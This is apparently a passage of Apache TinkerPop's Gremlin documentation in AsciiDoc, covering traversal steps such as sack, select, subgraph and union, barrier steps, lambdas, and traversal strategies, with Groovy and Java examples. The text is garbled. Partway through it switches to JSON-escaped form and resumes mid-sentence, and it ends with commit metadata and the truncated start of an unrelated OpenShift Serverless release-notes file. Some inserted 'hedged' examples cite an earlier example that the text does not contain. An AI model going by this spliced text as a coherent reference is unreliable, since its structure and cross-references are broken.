WARNING: The anonymous traversals of `emit()` and `until()` (not `repeat()`) process their current objects "locally." In OLAP, where the atomic unit of computing is the vertex and its local "star graph," it is important that the anonymous traversals do not leave the confines of the vertex's star graph. In other words, they can not traverse to an adjacent vertex's properties or edges.

[[sack-step]]
Sack Step
~~~~~~~~~

image:gremlin-sacks-running.png[width=175,float=right] A traverser can contain a local data structure called a "sack". The `sack()`-step is used to read and write sacks (*sideEffect* or *map*). Each sack of each traverser is created when using `GraphTraversal.withSack(initialValueSupplier,splitOperator?)`.

* *Initial value supplier*: A `Supplier` providing the initial value of each traverser's sack.
* *Split operator*: a `UnaryOperator` that clones the traverser's sack when the traverser splits. If no split operator is provided, then `UnaryOperator.identity()` is assumed.

Two trivial examples are presented below to demonstrate the *initial value supplier*. In the first example below, a traverser is created at each vertex in the graph (`g.V()`), with a 1.0 sack (`withSack(1.0f)`), and then the sack value is accessed (`sack()`). In the second example, a random float supplier is used to generate sack values.

[gremlin-groovy,modern]
----
g.withSack(1.0f).V().sack()
rand = new Random()
g.withSack {rand.nextFloat()}.V().sack()
----

A more complicated initial value supplier example is presented below where the sack values are used in a running computation and then emitted at the end of the traversal. When an edge is traversed, the edge weight is multiplied by the sack value (`sack(mult,'weight')`).

[gremlin-groovy,modern]
----
g.withSack(1.0f).V().repeat(outE().sack(mult,'weight').inV()).times(2)
g.withSack(1.0f).V().repeat(outE().sack(mult,'weight').inV()).times(2).sack()
g.withSack(1.0f).V().repeat(outE().sack(mult,'weight').inV()).times(2).path().
 by().by('weight')
----

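The same running-computation pattern should work with the other built-in binary operators. A hedged variation of the example above that adds, rather than multiplies, the edge weights along length-2 paths (`sum` here is the same built-in operator used by `fold(0, sum)` earlier):

[gremlin-groovy,modern]
----
g.withSack(0.0f).V().repeat(outE().sack(sum,'weight').inV()).times(2).sack()
----
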
image:gremlin-sacks-standing.png[width=100,float=left] When complex objects are used (i.e. non-primitives), then a *split operator* should be defined to ensure that each traverser gets a clone of its parent's sack. The first example below does not use a split operator and as such, the same map is propagated to all traversers (a global data structure). The second example demonstrates how `Map.clone()` ensures that each traverser's sack contains a unique, local sack.

[gremlin-groovy,modern]
----
g.withSack {[:]}.V().out().out().
 sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() // BAD: single map
g.withSack {[:]}{it.clone()}.V().out().out().
 sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() // GOOD: cloned map
----

NOTE: For primitives (i.e. integers, longs, floats, etc.), a split operator is not required as primitives are encoded in the memory address of the sack, not as a reference to an object.

[[sample-step]]
Sample Step
~~~~~~~~~~~

The `sample()`-step is useful for sampling some number of the previous traversers in the traversal.

[gremlin-groovy,modern]
----
g.V().outE().sample(1).values('weight')
g.V().outE().sample(1).by('weight').values('weight')
g.V().outE().sample(2).by('weight').values('weight')
----

One of the more interesting use cases for `sample()` is when it is used in conjunction with <<local-step,`local()`>>. The combination of the two steps supports the execution of link:http://en.wikipedia.org/wiki/Random_walk[random walks]. In the example below, the traversal starts at vertex 1 and selects one edge to traverse based on a probability distribution generated by the weights of the edges. The output is always a single path because, by selecting a single edge, the traverser never splits and continues down a single path in the graph.

[gremlin-groovy,modern]
----
g.V(1).repeat(local(
 bothE().sample(1).by('weight').otherV()
 )).times(5)
g.V(1).repeat(local(
 bothE().sample(1).by('weight').otherV()
 )).times(5).path()
g.V(1).repeat(local(
 bothE().sample(1).by('weight').otherV()
 )).times(10).path()
----

[[select-step]]
Select Step
~~~~~~~~~~~

link:http://en.wikipedia.org/wiki/Functional_programming[Functional languages] make use of function composition and lazy evaluation to create complex computations from primitive operations. This is exactly what `Traversal` does. One of the differentiating aspects of Gremlin's data flow approach to graph processing is that the flow need not always go "forward," but in fact, can go back to a previously seen area of computation. Examples include <<path-step,`path()`>> as well as the `select()`-step (*map*). There are two general ways to use `select()`-step.

. Select labeled steps within a path (as defined by `as()` in a traversal).
. Select objects out of a `Map<String,Object>` flow (i.e. a sub-map).

The first use case is demonstrated via example below.

[gremlin-groovy,modern]
----
g.V().as('a').out().as('b').out().as('c') // no select
g.V().as('a').out().as('b').out().as('c').select()
g.V().as('a').out().as('b').out().as('c').select('a','b')
g.V().as('a').out().as('b').out().as('c').select('a','b').by('name')
g.V().as('a').out().as('b').out().as('c').select('a') <1>
----

<1> If the selection is one step, no map is returned.

When there is only one label selected, then a single object is returned. This is useful for stepping back in a computation and easily moving forward again on the object reverted to.

[gremlin-groovy,modern]
----
g.V().out().out()
g.V().out().out().path()
g.V().as('x').out().out().select('x')
g.V().out().as('x').out().select('x')
g.V().out().out().as('x').select('x') // pointless
----

The second use case is best understood in terms of <<match-step,`match()`>>-step, where the result of `match()` is a `Map<String,Object>` of variable bindings.
However, any step that emits a `Map<String,Object>` can be selected. A contrived example is presented below.

[gremlin-groovy,modern]
----
g.V().range(0, 2).as('a').map {[b:1,c:2]} <1>
g.V().range(0, 2).as('a').map {[b:1,c:2]}.select(local) <2>
g.V().range(0, 2).as('a').map {[b:1,c:2]}.select(local,'a','c') <3>
g.V().range(0, 2).as('a').map {[b:1,c:2]}.select(local,'c') <4>
----

<1> A contrived example to create a `Map<String,Object>` flow as a foundation for the examples to follow.
<2> Select will grab both labeled steps and `Map<String,Object>` entries.
<3> The same `List<String>` selectivity can be used as demonstrated in the previous example.
<4> If a single selection is used, then the object is emitted without being wrapped in a map, which is useful for continuing the traversal process without having to do a map projection.

NOTE: When executing a traversal with `select()` on a standard traversal engine (i.e. OLTP), `select()` will do its best to avoid calculating the path history and instead will rely on a global data structure for storing the currently selected object. As such, if only a subset of the path walked is required, `select()` should be used over the more resource-intensive <<path-step,`path()`>>-step.

[[using-where-with-select]]
Using Where with Select
^^^^^^^^^^^^^^^^^^^^^^^

Finally, like <<match-step,`match()`>>-step, it is possible to use `where()`, as where is a filter that processes `Map<String,Object>` streams.

[gremlin-groovy,modern]
----
g.V().as('a').out('created').in('created').as('b').select().by('name') <1>
g.V().as('a').out('created').in('created').as('b').
 select().by('name').where('a',neq('b')) <2>
g.V().as('a').out('created').in('created').as('b').
 select(). <3>
 where('a',neq('b')).
 where(__.as('a').out('knows').as('b')).
 select().by('name')
----

<1> A standard `select()` that generates a `Map<String,Object>` of variable bindings in the path (i.e. `a` and `b`) for the sake of a running example.
<2> The `select().by('name')` projects each binding vertex to its name property value and `where()` operates to ensure the respective `a` and `b` strings are not the same.
<3> The first `select()` projects a vertex binding set. A binding is filtered if the `a` vertex equals the `b` vertex. A binding is filtered if `a` doesn't know `b`. The second and final `select()` projects the name of the vertices.

[[simplepath-step]]
SimplePath Step
~~~~~~~~~~~~~~~

image::simplepath-step.png[width=400]

When it is important that a traverser not repeat its path through the graph, `simplePath()`-step should be used (*filter*). The <<path-data-structure,path>> information of the traverser is analyzed and if the path has repeated objects in it, the traverser is filtered. If cyclic behavior is desired, see <<cyclicpath-step,`cyclicPath()`>>.

[gremlin-groovy,modern]
----
g.V(1).both().both()
g.V(1).both().both().simplePath()
g.V(1).both().both().simplePath().path()
----

[[store-step]]
Store Step
~~~~~~~~~~

When link:http://en.wikipedia.org/wiki/Lazy_evaluation[lazy] aggregation is needed, `store()`-step (*sideEffect*) should be used over <<aggregate-step,`aggregate()`>>.
The two steps differ in that `store()` does not block and only stores objects in its side-effect collection as they pass through.

[gremlin-groovy,modern]
----
g.V().aggregate('x').limit(1).cap('x')
g.V().store('x').limit(1).cap('x')
----

It is interesting to note that there are two results in the `store()` side-effect even though `limit(1)` only selects one object. Realize that when the second object is on its way to the `limit()` filter, it passes through `store()` and thus, is stored before being filtered.

[gremlin-groovy,modern]
----
g.E().store().by('weight')
----

[[subgraph-step]]
Subgraph Step
~~~~~~~~~~~~~

image::subgraph-logo.png[width=380]

Extracting a portion of a graph from a larger one for analysis, visualization, or other purposes is a fairly common use case for graph analysts and developers. The `subgraph()`-step (*sideEffect*) provides a way to produce an link:http://mathworld.wolfram.com/Edge-InducedSubgraph.html[edge-induced subgraph] from virtually any traversal. The following example demonstrates how to produce the "knows" subgraph:

[gremlin-groovy,modern]
----
subGraph = g.E().hasLabel('knows').subgraph('subGraph').cap('subGraph').next() <1>
sg = subGraph.traversal(standard())
sg.E() <2>
----

<1> As this function produces "edge-induced" subgraphs, `subgraph()` must be called at edge steps.
<2> The subgraph contains only "knows" edges.

A more common subgraphing use case is to get all of the graph structure surrounding a single vertex:

[gremlin-groovy,modern]
----
subGraph = g.V(3).repeat(__.inE().subgraph('subGraph').outV()).times(3).cap('subGraph').next() <1>
sg = subGraph.traversal(standard())
sg.E()
----

<1> Starting at vertex `3`, traverse 3 steps away on in-edges, outputting all of that into the subgraph.

There can be multiple `subgraph()` calls within the same traversal, each operating against either the same graph (i.e. the same side-effect key) or different graphs (i.e. different side-effect keys).

[gremlin-groovy,modern]
----
t = g.V().outE('knows').subgraph('knowsG').inV().outE('created').subgraph('createdG').
 inV().inE('created').subgraph('createdG').iterate()
t.sideEffects.get('knowsG').get().traversal(standard()).E()
t.sideEffects.get('createdG').get().traversal(standard()).E()
----

IMPORTANT: The `subgraph()`-step only writes to graphs that support user-supplied ids for its elements. Moreover, if no graph is specified via `withSideEffect()`, then <<tinkergraph-gremlin,TinkerGraph>> is assumed.

[[sum-step]]
Sum Step
~~~~~~~~

The `sum()`-step (*map*) operates on a stream of numbers and sums the numbers together to yield a double. Note that the current traverser number is multiplied by the traverser bulk to determine how many such numbers are being represented.

[gremlin-groovy,modern]
----
g.V().values('age').sum()
g.V().repeat(both()).times(3).values('age').sum()
----

IMPORTANT: `sum(local)` determines the sum of the current, local object (not the objects in the traversal stream). This works for `Collection`-type objects. For any other object, a sum of `Double.NaN` is returned.

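A brief, hedged sketch of `sum(local)` per the note above (modern toy graph assumed):

[gremlin-groovy,modern]
----
g.V().hasLabel('person').values('age').fold() <1>
g.V().hasLabel('person').values('age').fold().sum(local) <2>
----

<1> Fold the ages into a single `Collection`.
<2> Sum the members of that local `Collection` rather than the objects of the traversal stream.
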
[[timelimit-step]]
TimeLimit Step
~~~~~~~~~~~~~~

In many situations, a graph traversal is not about getting an exact answer as much as it is about getting a relative ranking. A classic example is link:http://en.wikipedia.org/wiki/Recommender_system[recommendation]. What is desired is a relative ranking of vertices, not their absolute rank. Next, it may be desirable to have the traversal execute for no more than 2 milliseconds. In such situations, `timeLimit()`-step (*filter*) can be used.

image::timelimit-step.png[width=400]

NOTE: The method `clock(int runs, Closure code)` is a utility preloaded in the <<gremlin-console,Gremlin Console>> that can be used to time execution of a body of code.

[gremlin-groovy,modern]
----
g.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()
clock(1) {g.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}
g.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()
clock(1) {g.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}
----

In essence, the relative order is respected, even though the number of traversers at each vertex is not. The primary benefit is that the calculation is guaranteed to complete at the specified time limit (in milliseconds). Finally, note that the internal clock of `timeLimit()`-step starts when the first traverser enters it. When the time limit is reached, any `next()` evaluation of the step will yield a `NoSuchElementException` and any `hasNext()` evaluation will yield `false`.

[[tree-step]]
Tree Step
~~~~~~~~~

From any one element (i.e. vertex or edge), the emanating paths from that element can be aggregated to form a link:http://en.wikipedia.org/wiki/Tree_(data_structure)[tree]. Gremlin provides `tree()`-step (*sideEffect*) for such situations.

image::tree-step.png[width=450]

[gremlin-groovy,modern]
----
tree = g.V().out().out().tree().next()
----

It is important to see how the paths of all the emanating traversers are united to form the tree.

image::tree-step2.png[width=500]

The resultant tree data structure can then be manipulated (see link:http://www.tinkerpop.com/javadocs/current/org/apache/tinkerpop/gremlin/process/graph/step/util/Tree.html[Tree JavaDoc]). For the sake of demonstration, the running example below keys the tree by vertex names via a `by('name')`-modulation.

[gremlin-groovy,modern]
----
tree = g.V().out().out().tree().by('name').next()
tree['marko']
tree['marko']['josh']
tree.getObjectsAtDepth(3)
----

[[unfold-step]]
Unfold Step
~~~~~~~~~~~

If the object reaching `unfold()` (*flatMap*) is an iterator, iterable, or map, then it is unrolled into a linear form. If not, then the object is simply emitted. Please see <<fold-step,`fold()`>>-step for the inverse behavior.

[gremlin-groovy,modern]
----
g.V(1).out().fold().inject('gremlin',[1.23,2.34])
g.V(1).out().fold().inject('gremlin',[1.23,2.34]).unfold()
----

Note that `unfold()` does not recursively unroll iterators. Instead, `repeat()` can be used for recursive unrolling.

[gremlin-groovy,modern]
----
inject(1,[2,3,[4,5,[6]]])
inject(1,[2,3,[4,5,[6]]]).unfold()
inject(1,[2,3,[4,5,[6]]]).repeat(unfold()).until(unfold().count().is(1l)).unfold()
----

[[union-step]]
Union Step
~~~~~~~~~~

image::union-step.png[width=650]

The `union()`-step (*branch*) supports the merging of the results of an arbitrary number of traversals. When a traverser reaches a `union()`-step, it is copied to each of its internal steps.
The traversers emitted from `union()` are the outputs of the respective internal traversals.

[gremlin-groovy,modern]
----
g.V(4).union(
 __.in().values('age'),
 out().values('lang'))
g.V(4).union(
 __.in().values('age'),
 out().values('lang')).path()
----

[[valuemap-step]]
ValueMap Step
~~~~~~~~~~~~~

The `valueMap()`-step yields a Map representation of the properties of an element.

[gremlin-groovy,modern]
----
g.V().valueMap()
g.V().valueMap('age')
g.V().valueMap('age','blah')
g.E().valueMap()
----

It is important to note that the map of a vertex maintains a list of values for each key. The map of an edge or vertex-property represents a single property (not a list). The reason is that vertices in TinkerPop3 leverage <<vertex-properties,vertex properties>>, which support multiple values per key. Using the <<the-crew-toy-graph,"The Crew">> toy graph, the point is made explicit.

[gremlin-groovy,theCrew]
----
g.V().valueMap()
g.V().has('name','marko').properties('location')
g.V().has('name','marko').properties('location').valueMap()
----

If the `id`, `label`, `key`, and `value` of the `Element` are desired, then a boolean triggers their insertion into the returned map.

[gremlin-groovy,theCrew]
----
g.V().hasLabel('person').valueMap(true)
g.V().hasLabel('person').valueMap(true,'name')
g.V().hasLabel('person').properties('location').valueMap(true)
----

[[vertex-steps]]
Vertex Steps
~~~~~~~~~~~~

image::vertex-steps.png[width=350]

The vertex steps (*flatMap*) are fundamental to the Gremlin language. Via these steps, it is possible to "move" on the graph -- i.e. traverse.

* `out(string...)`: Move to the outgoing adjacent vertices given the edge labels.
* `in(string...)`: Move to the incoming adjacent vertices given the edge labels.
* `both(string...)`: Move to both the incoming and outgoing adjacent vertices given the edge labels.
* `outE(string...)`: Move to the outgoing incident edges given the edge labels.
* `inE(string...)`: Move to the incoming incident edges given the edge labels.
* `bothE(string...)`: Move to both the incoming and outgoing incident edges given the edge labels.
* `outV()`: Move to the outgoing vertex.
* `inV()`: Move to the incoming vertex.
* `bothV()`: Move to both vertices.
* `otherV()`: Move to the vertex that was not the vertex that was moved from.

[gremlin-groovy,modern]
----
g.V(4)
g.V(4).outE() <1>
g.V(4).inE('knows') <2>
g.V(4).inE('created') <3>
g.V(4).bothE('knows','created','blah')
g.V(4).bothE('knows','created','blah').otherV()
g.V(4).both('knows','created','blah')
g.V(4).outE().inV() <4>
g.V(4).out() <5>
g.V(4).inE().outV()
g.V(4).inE().bothV()
----

<1> All outgoing edges.
<2> All incoming knows-edges.
<3> All incoming created-edges.
<4> Moving forward touching edges and vertices.
<5> Moving forward only touching vertices.

[[where-step]]
Where Step
~~~~~~~~~~

The `where()`-step filters the current object based on either the object itself (`Scope.local`) or the path history of the object (`Scope.global`) (*filter*). This step is typically used in conjunction with either <<match-step,`match()`>>-step or <<select-step,`select()`>>-step, but can be used in isolation.

[gremlin-groovy,modern]
----
g.V(1).as('a').out('created').in('created').where(neq('a')) <1>
g.withSideEffect('a'){['josh','peter']}.V(1).out('created').in('created').values('name').where(within('a')) <2>
g.V(1).out('created').in('created').where(out('created').count().is(gt(1))).values('name') <3>
----

<1> Who are marko's collaborators, where marko can not be his own collaborator? (predicate)
<2> Of the co-creators of marko, only keep those whose name is josh or peter. (using a sideEffect)
<3> Which of marko's collaborators have worked on more than 1 project? (using a traversal)

IMPORTANT: Please see <<using-where-with-match,`match().where()`>> and <<using-where-with-select,`select().where()`>> for how `where()` can be used in conjunction with `Map<String,Object>` projecting steps -- i.e. `Scope.local`.

[[a-note-on-barrier-steps]]
A Note on Barrier Steps
-----------------------

image:barrier.png[width=165,float=right] Gremlin is primarily a link:http://en.wikipedia.org/wiki/Lazy_evaluation[lazy], stream processing language. This means that Gremlin fully processes (to the best of its abilities) any traversers currently in the traversal pipeline before getting more data from the start/head of the traversal. However, there are numerous situations in which a completely lazy computation is not possible (or impractical). When a computation is not lazy, a "barrier step" exists. There are three types of barriers:

 . `CollectingBarrierStep`: All of the traversers prior to the step are put into a collection and then processed in some way (e.g. ordered) prior to the collection being "drained" one-by-one to the next step. Examples include: <<order-step,`order()`>>, <<sample-step,`sample()`>>, <<aggregate-step,`aggregate()`>>.
 . `ReducingBarrierStep`: All of the traversers prior to the step are processed by a reduce function and once all the previous traversers are processed, a single "reduced value" traverser is emitted to the next step. Examples include: <<fold-step,`fold()`>>, <<count-step,`count()`>>, <<sum-step,`sum()`>>, <<max-step,`max()`>>, <<min-step,`min()`>>.
 . `SupplyingBarrierStep`: All of the traversers prior to the step are iterated (no processing) and then some provided supplier yields a single traverser to continue to the next step. Examples include: <<cap-step,`cap()`>>.

In Gremlin OLAP (see <<traversalvertexprogram,`TraversalVertexProgram`>>), a barrier is introduced at the end of every <<vertex-steps,adjacent vertex step>>. This means that the traversal does its best to compute as much as possible at the current, local vertex. What it can't compute without referencing an adjacent vertex is aggregated into a barrier collection. When there are no more traversers at the local vertex, the barriered traversers are the messages that are propagated to remote vertices for further processing.

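The three barrier flavors can be seen with steps already introduced; the short sketch below over the modern toy graph simply restates the classification in the list above.

[gremlin-groovy,modern]
----
g.V().values('name').order() <1>
g.V().count() <2>
g.V().aggregate('x').cap('x') <3>
----

<1> A `CollectingBarrierStep`: all of the names are collected and sorted before the collection is drained downstream.
<2> A `ReducingBarrierStep`: all incoming traversers are folded into a single count traverser.
<3> A `SupplyingBarrierStep`: `cap()` iterates everything prior and then supplies the side-effect value as a single traverser.
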
However, it is advised to avoid using lambdas if possible.\n\n[gremlin-groovy,modern]\n----\ng.V().filter{it.get().value('name') == 'marko'}.\n flatMap{it.get().vertices(OUT,'created')}.\n map {it.get().value('name')} <1>\ng.V().has('name','marko').out('created').values('name') <2>\n----\n\n<1> A lambda-rich Gremlin traversal which should and can be avoided. (*bad*)\n<2> The same traversal (result), but without using lambdas. (*good*)\n\nGremlin attempts to provide the user with a comprehensive collection of steps in the hopes that the user will never need to leverage a lambda in practice. It is advised that users leverage a lambda if and only if there is no corresponding lambda-less step that encompasses the desired functionality. The reason is that lambdas cannot be optimized by Gremlin's compiler strategies, as they cannot be programmatically inspected (see <<traversalstrategy,traversal strategies>>).\n\nIn many situations where a lambda could be used, either a corresponding step exists or a traversal can be provided in its place. A `TraversalLambda` behaves like a typical lambda, but it can be optimized and it yields fewer objects than the corresponding pure-lambda form.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by {it.value('name')}.\n by {it.value('name')}.\n by {g.V(it).in('created').values('name').fold().next()} <1>\ng.V().out().out().path().by('name').\n by('name').\n by(__.in('created').values('name').fold()) <2>\n----\n\n<1> The length-3 paths have each of their objects transformed by a lambda. (*bad*)\n<2> The length-3 paths have their objects transformed by a lambda-less step and a traversal lambda. (*good*)\n\n[[traversalstrategy]]\nTraversalStrategy\n-----------------\n\nimage:traversal-strategy.png[width=125,float=right] A `TraversalStrategy` can analyze a `Traversal` and mutate the traversal as it deems fit. This is useful in multiple situations:\n\n * There is an application-level feature that can be embedded into the traversal logic (*decoration*).\n * There is a more efficient way to express the traversal at the TinkerPop3 or graph vendor level (*optimization*).\n * There are some final adjustments required before executing the traversal (*finalization*).\n * There are certain traversals that are not legal for the application or traversal engine (*verification*).\n\nA simple `OptimizationStrategy` is the `IdentityRemovalStrategy`.\n\n[source,java]\n----\npublic class IdentityRemovalStrategy extends AbstractTraversalStrategy<TraversalStrategy.OptimizationStrategy> implements TraversalStrategy.OptimizationStrategy {\n\n private static final IdentityRemovalStrategy INSTANCE = new IdentityRemovalStrategy();\n\n private IdentityRemovalStrategy() {\n }\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n if (!TraversalHelper.hasStepOfClass(IdentityStep.class, traversal))\n return;\n TraversalHelper.getStepsOfClass(IdentityStep.class, traversal).stream()\n .filter(step -> !TraversalHelper.isLabeled(step))\n .forEach(step -> traversal.removeStep(step));\n }\n\n public static IdentityRemovalStrategy instance() {\n return INSTANCE;\n }\n}\n----\n\nThis strategy simply removes any unlabeled `IdentityStep` steps in the Traversal, as `aStep().identity().identity().bStep()` is equivalent to `aStep().bStep()`. For those traversal strategies that require other strategies to execute prior or post to the strategy, the following two methods can be defined in `TraversalStrategy` (with defaults being an empty set). 
If the `TraversalStrategy` is in a particular traversal category (i.e. decoration, optimization, finalization, or verification), then priors and posts are only possible within the category.\n\n[source,java]\npublic Set<Class<? extends S>> applyPrior();\npublic Set<Class<? extends S>> applyPost();\n\nIMPORTANT: `TraversalStrategy` instances are sorted within their category and the categories are then executed in the following order: decoration, optimization, finalization, and verification. If a strategy does not fit cleanly into these categories, then it can implement `TraversalStrategy` directly and its priors and posts can reference strategies within any category.\n\nAnother example `OptimizationStrategy` in action is provided below.\n\n[source,groovy]\ng.V().has('name','marko')\n\nThe expression above can be executed in an `O(|V|)` or `O(log(|V|))` fashion in <<tinkergraph-gremlin,TinkerGraph>> depending on whether there is or is not an index defined for \"name.\"\n\n[source,java]\n----\npublic final class TinkerGraphStepStrategy extends AbstractTraversalStrategy<TraversalStrategy.OptimizationStrategy> implements TraversalStrategy.OptimizationStrategy {\n\n private static final TinkerGraphStepStrategy INSTANCE = new TinkerGraphStepStrategy();\n private static final Set<Class<? extends OptimizationStrategy>> PRIORS = new HashSet<>();\n\n static {\n PRIORS.add(IdentityRemovalStrategy.class);\n }\n\n private TinkerGraphStepStrategy() {\n }\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n if (traversal.getEngine().isComputer())\n return;\n\n final Step<?, ?> startStep = traversal.getStartStep();\n if (startStep instanceof GraphStep) {\n final GraphStep<?> originalGraphStep = (GraphStep) startStep;\n final TinkerGraphStep<?> tinkerGraphStep = new TinkerGraphStep<>(originalGraphStep);\n TraversalHelper.replaceStep(startStep, (Step) tinkerGraphStep, traversal);\n\n Step<?, ?> currentStep = tinkerGraphStep.getNextStep();\n while (true) {\n if (currentStep instanceof HasContainerHolder) {\n tinkerGraphStep.hasContainers.addAll(((HasContainerHolder) currentStep).getHasContainers());\n currentStep.getLabels().forEach(tinkerGraphStep::addLabel);\n traversal.removeStep(currentStep);\n } else {\n break;\n }\n currentStep = currentStep.getNextStep();\n }\n }\n }\n\n @Override\n public Set<Class<? extends OptimizationStrategy>> applyPrior() {\n return PRIORS;\n }\n\n public static TinkerGraphStepStrategy instance() {\n return INSTANCE;\n }\n}\n----\n\nThe traversal is redefined by simply taking a chain of `has()`-steps after `g.V()` (`TinkerGraphStep`) and providing them to `TinkerGraphStep`. Then it's up to `TinkerGraphStep` to determine if an appropriate index exists. In the code below, review the `vertices()` method and note how if an index exists, for a particular `HasContainer`, then that index is first queried before the remaining `HasContainer` filters are serially applied.\n\n[gremlin-groovy,modern]\n----\nt = g.V().has('name','marko'); null\nt.toString()\nt.iterate(); null\nt.toString()\n----\n\nA collection of useful `DecorationStrategy` strategies is provided with TinkerPop3 and these are generally useful to end-users. The following sub-sections detail these strategies:\n\nElementIdStrategy\n~~~~~~~~~~~~~~~~~\n\n`ElementIdStrategy` provides control over element identifiers. 
Some Graph implementations, such as TinkerGraph, allow specification of custom identifiers when creating elements:\n\n[gremlin-groovy]\n----\ng = TinkerGraph.open().traversal()\nv = g.addV(id,'42a')\ng.V('42a')\n----\n\nOther `Graph` implementations, such as Neo4j, generate element identifiers automatically, and identifiers cannot be assigned. As a helper, `ElementIdStrategy` can be used to make identifier assignment possible by using vertex and edge indices under the hood.\n\n[source,groovy]\n----\ngremlin> graph = Neo4jGraph.open('\/tmp\/neo4j')\n==>neo4jgraph[EmbeddedGraphDatabase [\/tmp\/neo4j]]\ngremlin> strategy = ElementIdStrategy.build().create()\n==>ElementIdStrategy\ngremlin> g = GraphTraversalSource.build().with(strategy).create(graph)\n==>graphtraversalsource[neo4jgraph[EmbeddedGraphDatabase [\/tmp\/neo4j]], standard]\ngremlin> g.addV(id, '42a').id()\n==>42a\n----\n\nIMPORTANT: The key that is used to store the assigned identifier should be indexed in the underlying graph database. If it is not indexed, then lookups for the elements that use these identifiers will perform a linear scan.\n\nEventStrategy\n~~~~~~~~~~~~~\n\nThe purpose of the `EventStrategy` is to raise events to one or more `MutationListener` objects as changes to the underlying `Graph` occur within a `Traversal`. Such a strategy is useful for logging changes, triggering certain actions based on change, or any application that needs notification of some mutating operation during a `Traversal`. Graphs that do not support transactions will generate events immediately upon mutation, while those graphs that support transactions will queue the mutations until that transaction is committed and will then raise the events. If the transaction is rolled back, the event queue is reset.\n\nThe following events are raised to the `MutationListener`:\n\n* New vertex\n* New edge\n* Vertex property changed\n* Edge property changed\n* Vertex property removed\n* Edge property removed\n* Vertex removed\n* Edge removed\n\nTo start processing events from a `Traversal`, first implement the `MutationListener` interface. An example of this implementation is the `ConsoleMutationListener`, which writes output to the console for each event. The following console session displays the basic usage:\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nl = new ConsoleMutationListener(graph)\nstrategy = EventStrategy.build().addListener(l).create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.addV('name','stephen')\ng.E().drop()\n----\n\nThe example above uses TinkerGraph, which does not support transactions. As mentioned previously, for these types of graph implementations events are raised as they occur within execution of a `Step`. As such, the final line of Gremlin execution that drops all edges shows a bit of an inconsistent count, where the removed edge count is accounted for after the event is raised.\n\nCAUTION: `EventStrategy` is not meant for use in tracking global mutations across separate processes. In other words, a mutation in one JVM process is not raised as an event in a different JVM process. In addition, events are not raised when mutations occur outside of the `Traversal` context.\n\nPartitionStrategy\n~~~~~~~~~~~~~~~~~\n\nimage::partition-graph.png[width=325]\n\n`PartitionStrategy` partitions the vertices and edges of a graph into `String` named partitions (i.e. buckets, subgraphs, etc.). 
The idea behind `PartitionStrategy` is presented in the image above where each element is in a single partition (represented by its color). Partitions can be read from, written to, and linked\/joined by edges that span one or two partitions (e.g. a tail vertex in one partition and a head vertex in another).\n\nThere are three primary variables in `PartitionStrategy`:\n\n. Partition Key - The property key that denotes a String value representing a partition.\n. Write Partition - A `String` denoting what partition all future written elements will be in.\n. Read Partitions - A `Set<String>` of partitions that can be read from.\n\nThe best way to understand `PartitionStrategy` is via example.\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nstrategyA = PartitionStrategy.build().partitionKey(\"_partition\").writePartition(\"a\").addReadPartition(\"a\").create()\nstrategyB = PartitionStrategy.build().partitionKey(\"_partition\").writePartition(\"b\").addReadPartition(\"b\").create()\ngA = GraphTraversalSource.build().with(strategyA).create(graph)\ngA.addV() \/\/ this vertex has a property of {_partition:\"a\"}\ngB = GraphTraversalSource.build().with(strategyB).create(graph)\ngB.addV() \/\/ this vertex has a property of {_partition:\"b\"}\ngA.V()\ngB.V()\n----\n\nBy writing elements to particular partitions and then restricting read partitions, the developer is able to create multiple graphs within a single address space. Moreover, by supporting references between partitions, it is possible to merge those multiple graphs (i.e. join partitions).\n\nReadOnlyStrategy\n~~~~~~~~~~~~~~~~\n\n`ReadOnlyStrategy` is largely self-explanatory. A `Traversal` that has this strategy applied will throw an `IllegalStateException` if the `Traversal` has any mutating steps within it.\n\nSubgraphStrategy\n~~~~~~~~~~~~~~~~\n\n`SubgraphStrategy` is quite similar to `PartitionStrategy` in that it restrains a `Traversal` to certain vertices and edges as determined by a `Predicate` defined individually for each.\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nvertexCriterion = { vertex -> true }\nedgeCriterion = { edge -> edge.id() >= 8 && edge.id() <= 10}\nstrategy = SubgraphStrategy.build().vertexPredicate(vertexCriterion).edgePredicate(edgeCriterion).create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.V() \/\/ shows all vertices as they all pass the vertexCriterion\ng.E() \/\/ shows only the edges defined in the edgeCriterion\n----\n\nNote that `SubgraphStrategy` directly passes the edge and vertex criterion `Predicate` objects to an injected `filter` step and as such may not take advantage of important optimizations provided by the various `Graph` implementations (given the use of lambda expressions).\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f1aad94ff51f1dc8ab14bd17964a5369a3fad75a","subject":"added QE feedback","message":"added QE feedback\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/serverless-rn-1-12-0.adoc","new_file":"modules\/serverless-rn-1-12-0.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * serverless\/release-notes.adoc\n\n[id=\"serverless-rn-1-12-0_{context}\"]\n\n= Release Notes for Red Hat {ServerlessProductName} 1.12.0\n\n[id=\"new-features-1-12-0_{context}\"]\n== New features\n\n* {ServerlessProductName} now uses Knative Serving 
